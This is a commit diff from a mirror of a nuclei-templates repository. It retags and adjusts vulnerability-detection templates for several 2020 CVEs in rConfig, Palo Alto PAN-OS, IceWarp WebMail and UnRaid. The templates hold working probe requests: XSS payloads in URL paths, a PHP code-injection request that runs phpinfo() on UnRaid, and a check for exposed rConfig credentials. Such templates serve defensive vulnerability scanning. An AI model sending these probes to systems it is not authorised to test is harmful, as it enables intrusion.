daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

misc changes

patch-1
sandeep 2021-02-16 00:35:52 +05:30
parent 93ede98673
commit 6e392df4c4
8 changed files with 31 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
cves/2020/CVE-2020-10546.yaml
View File

@ -4,7 +4,7 @@ info:
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
tags: SQLI
tags: cve,cve2020,rconfig,sqli
requests:
- method: GET

2
cves/2020/CVE-2020-10547.yaml
View File

@ -4,7 +4,7 @@ info:
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
tags: SQLI
tags: cve,cve2020,rconfig,sqli
requests:
- method: GET

2
cves/2020/CVE-2020-10548.yaml
View File

@ -4,7 +4,7 @@ info:
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
tags: SQLI
tags: cve,cve2020,rconfig,sqli
requests:
- method: GET

2
cves/2020/CVE-2020-10549.yaml
View File

@ -4,7 +4,7 @@ info:
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
tags: SQLI
tags: cve,cve2020,rconfig,sqli
requests:
- method: GET

12
cves/2020/CVE-2020-2036.yaml
View File

@ -1,21 +1,29 @@
id: CVE-2020-2036
info:
name: Palo Alto Networks Reflected Cross Site Scripting
name: Palo Alto Networks Reflected XSS
author: madrobot
severity: medium
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
tags: XSS
tags: cve,cve2020,vpn,xss
requests:
- method: GET
path:
- "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
- "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1)>"
part: body
- type: word
words:
- "text/html"
part: header

9
cves/2020/CVE-2020-27982.yaml
View File

@ -4,18 +4,25 @@ info:
author: madrobot
severity: medium
reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
tags: XSS
tags: cve,cve2020,xss,icewarp
requests:
- method: GET
path:
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<img src=x onerror=alert(1)>"
part: body
- type: word
words:
- "text/html"
part: header

10
cves/2020/CVE-2020-5847.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2020-5847
info:
name: UnRaid Remote Code Execution
name: UnRaid Remote Code Execution
author: madrobot
severity: high
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
tags: Directory Traversal
tags: cve,cve2020,rce
requests:
- method: GET
path:
- "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
matchers-condition: and
matchers:
- type: status
@ -17,5 +18,6 @@ requests:
- 200
- type: word
words:
- "http://www.php.net/"
part: body
- "PHP Extension"
- "PHP Version"
condition: and

5
cves/2020/CVE-2020-9425.yaml
View File

@ -3,8 +3,8 @@ info:
name: rConfig Unauthenticated Sensitive Information Disclosure
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
tags: Information Disclosure
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9425
tags: cve,cve2020,rconfig
requests:
- method: GET
@ -19,4 +19,5 @@ requests:
words:
- "defaultNodeUsername"
- "defaultNodePassword"
condition: and
part: body